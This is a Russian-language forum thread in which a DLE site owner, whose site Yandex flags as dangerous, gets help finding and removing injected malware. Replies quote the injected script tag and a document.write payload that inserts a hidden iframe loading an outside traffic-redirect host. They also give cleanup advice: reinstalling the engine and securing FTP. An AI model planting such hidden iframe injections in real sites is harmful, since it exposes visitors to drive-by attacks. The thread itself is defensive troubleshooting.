Перейти к публикации

Яндекс ограничил выдачу из-за вирусов


Рекомендованные сообщения

Итак сайт http://roboting.ru

Вду 9.2 лицензия

В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

http://roboting.ru/1021-neato-xv-11-poboretsja-s-roomba-na.html 19.08.2011 Поведенческий анализ

http://roboting.ru/space-robots/ 19.08.2011 Поведенческий анализ

http://roboting.ru/809-nepobedimye-transformery-teper-i-na.html 20.08.2011 Поведенческий анализ

http://roboting.ru/16-teorija-promyshlennykh-robotov.html 24.08.2011 Поведенческий анализ

http://roboting.ru/1021-neato-xv-11-poboretsja-s-roomba-na.html 24.08.2011 Exploit

http://roboting.ru/809-nepobedimye-transformery-teper-i-na.html 24.08.2011 Exploit

http://roboting.ru/space-robots/ 24.08.2011 Поведенческий анализ

http://roboting.ru/ 24.08.2011 Поведенческий анализ

http://roboting.ru/space-robots/ 24.08.2011 Exploit

http://roboting.ru/1021-neato-xv-11-poboretsja-s-roomba-na.html 24.08.2011 Поведенческий анализ

Не могу найти код трояна на сайте. У людей ругается на во это <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://best-pp.net/in.php?id=9544&quo...script>

Комп почистил, пароли поменял

Помогите обезвредить этот вирус.

Спасибо!

Ссылка на сообщение
Поделиться на других сайтах

А вот и содержание эксплойта:

document.write('<div style="position: absolute;left: 0;bottom: 100%;"><iframe src="http://traff-tds3.cz.cc/forum.php" width=10 height=49></iframe></div>');

Может модули левые ставил?

Ссылка на сообщение
Поделиться на других сайтах

Подскажите как вы его нашли и где?

модули стоят сторонние такие:

1. последниме коменты в левом сайдбаре и

еще коменты которые сейчас отключены, которые выводят новости с картинками

Ссылка на сообщение
Поделиться на других сайтах

Нашел я его по ссылке из того-самого скрипта, который висит в шапке вашего сайта. По идее данный скрипт должен был выводить на вашем сайте какую-нибудь какашку вроде окошка, баннера и т.п. Но вывести не смог наверно потому, что в DLE заблокирован тег <iframe>. Ссылки на установленные модули приведите, пожалуйста. Или листинги.

Ссылка на сообщение
Поделиться на других сайтах

Итак.

я смотрю у меня группа фэйсбук выводится через тег iframe. но из-за этого не должно ругаться?

Модули стоят такие:

1. topnews_mod.php

2. engine/modules/iComm/run.php

Ден, такую. же шляпу и я видел. Но это после того как появился вирус. Видимо он выводит, и получается такой бред

Раньше такого не было

Ссылка на сообщение
Поделиться на других сайтах

_1314219823948.jpeg

У меня в Opera все нормально выводится.

Итак.

я смотрю у меня группа фэйсбук выводится через тег iframe. но из-за этого не должно ругаться?

Модули стоят такие:

1. topnews_mod.php

2. engine/modules/iComm/run.php

Мне ваши ссылки ничего не дают. Модули платные? Если бесплатные, то приведите листинги прямо здесь. А еще попробуйте поискать эксплойт в файле index.php, обычно зараза далеко не уходит.

Ссылка на сообщение
Поделиться на других сайтах

модули бесплатные

Не совсем понял, что такое листинги

один модуль имеет название

Последние Коментарии 3.3

Настройки модуля, функции Show Hint и параметры вывода блока.

второй не знаю как точно называется

В index.php все уже перерыл. вроде нету

Ссылка на сообщение
Поделиться на других сайтах

Например вот это:

$commentslast = dle_cache( "comments-last", $config['skin'] );    if( ! $commentslast ) {    include( ROOT_DIR . "/engine/data/comments-last.php" );    if( $commentslast['on'] == "1" ) {    define( "LIMITCOMM", $commentslast['lines'] );  define( "LIMITTITL", $commentslast['titlelimit'] );  define( "SHOWHITHB", $commentslast['showhint'] );

Это и есть тот самый листинг.

- Den -, в FF такую же фигню показывает. ТС еще раз вам говорю, загляните в файл index.php! Заметите что нибудь подозрительное - пишите! Онлайн сканеры вам ничего не дадут! Они получают только HTML-код, а искать нужно в исходниках.

Имя какашки: [Trojan-Clicker.HTML.IFrame (v)]

FTP пользуетесь?

edit:

Попробуйте вызвать Диспетчер задач (Cntrl + Alt + Delete) и перейдите на вкладку "Процессы". Теперь ищите следующие процессы:

DMEYN.EXE

DMN.EXE

DMV.EXE

DMR.EXE

DML.EXE

DMT.EXE

DMP.EXE

RVL.EXE

1.EXE

ZJ7.EXE

ZJ9.EXE

_DMN IT PAGALBA.EXE

18046662.EXE

Если что-то подобное нашли, знайте - зараза попала на сайта с вашего компьютера.

Изменено пользователем Compton
Ссылка на сообщение
Поделиться на других сайтах

1.Да, пользуюсь ФТП через Filezilla

2.залил index.php который идет с DLE

Гляньте, что-нибудь поменялось или нет?

3. Модуль вот такой. Открыл главную страницу этого модуля и скопировал код:

<?php

Author: RooTM

------------------------------------------------------

Web-site: http://weboss.net/

=====================================================*/

if( ! defined( 'DATALIFEENGINE' ) ) {

die( "Hacking attempt!" );

}

$max_text = 70;

$max_title = 30;

$max_comm = 5;

$groups_color = "group_1:#FF0000,group_2:#CC33CC,group_3:#009900,group_4:#3333FF";

$is_change = false;

if ($config['allow_cache'] != "yes") { $config['allow_cache'] = "yes"; $is_change = true;}

$iComm = dle_cache( "iComm", $config['skin'] );

if( $iComm === false ) {

require_once ENGINE_DIR . '/classes/templates.class.php';

$tpl = new dle_template ( );

$tpl->dir = ENGINE_DIR . '/modules/iComm/';

define ( 'TEMPLATE_DIR', $tpl->dir );

$db->query( "SELECT comments.post_id,comments.user_id, comments.is_register, comments.text, comments.autor, comments.email,comments.approve, post.id, post.date as newsdate, post.title, post.category, post.comm_num, post.alt_name, post.flag,users.user_group,users.user_id FROM " . PREFIX . "_comments as comments, " . PREFIX . "_post as post, " . PREFIX . "_users as users WHERE post.id=comments.post_id AND comments.user_id = users.user_id AND comments.approve = 1 ORDER BY comments.date DESC LIMIT 0, " . $max_comm );

while ( $row = $db->get_row() ) {

нет, нету таких процессов, Правда я проверял комп вчера на вирусы

Ссылка на сообщение
Поделиться на других сайтах

В приведенном вами листинге вредоносного кода нет. После перезаливки ничего не поменялось. Попробуйте перезалить шаблон вашего сайта (все файлы).

Ссылка на сообщение
Поделиться на других сайтах

да там вообще любой вредоносный код в базе может храниться, в самих новостях. можете до передоза проверять файлы движка, не поможет.

поищи на форуме куча ссылок как лечиться от заразы

было бы неплохо, если администрация вынесла эту тему куда то отдельной ссылкой, ибо куча тема плодится новых

Изменено пользователем prikindel
Ссылка на сообщение
Поделиться на других сайтах

ТС, короче, есть самый радикальный, быстрый и эффективный метод. Называется переустановка движка.

Заходите сюда : engine/data

Папка живет тут:

http://roboting.ru/engine/data

Копируете оттуда все файлы себе на компьютер.

Заходите сюда : engine/cache

Папка живет тут:

http://roboting.ru/engine/cache

Копируете оттуда все файлы себе на компьютер. Чтобы в дальнейшем работали категории, группы пользователей и т.д.

Если надо, копируете папку backup из корня сайта. В ней могут хранится дампы БД (если вы конечно их делали).

Папка живет тут:

http://roboting.ru/backup/

Сносите подчистую движок.

Теперь заранее скопированную папку data кидаете в папку с движком на вашем компьютере (в папку engine). Подтверждаете замену файлов.

Папку cache туда же.

Копируете папку backup в корневую папку.

Заливаете папку с движком себе на сайт. Внимание! Жмякать в install.php не надо! Установка нам не нужна.

Смотрите. зараза исчезла - ура! Не исчезла - значит, как сказал prikindel, гадость где-то в БД.

Изменено пользователем Compton
Ссылка на сообщение
Поделиться на других сайтах

перезалил шаблон

Ну что?

Перезаливать нужно не только шаблон, но и все оригинальные файлы скрипта, вернув все оригинальные.

да там вообще любой вредоносный код в базе может храниться, в самих новостях. можете до передоза проверять файлы движка, не поможет.

Ничего в БД у автора не хранится, это видно по коду страницы, сам вирус выводится самой первой строкой, что говорит, что он скорее всего где то в одном из файлов скрипта. А по причине обычного воровства FTP доступа, т.к. эти файлы только по FTP, можно поменять.

Как воруются доступы и какие меры предпринять вы можете прочитать в темах на форуме

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

Там подробно описано как могут вороваться FTP доступы и как от этого защитится. Проверяйте свой компьютер на вирусы, меняйте все пароли, в том числе и по FTP и к БД. Установите ограничение по IP на доступ по FTP.

Если после перезаливки файлов скрипта на оригинальные проблема не решится, то посмотрите вручную файлы в папке engine/data/ есть ли там код, т.к. в дистрибутиве нет файлов в этой папке и перезаливка дистрибутива не очистит эти файлы от гадости, если она в них.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...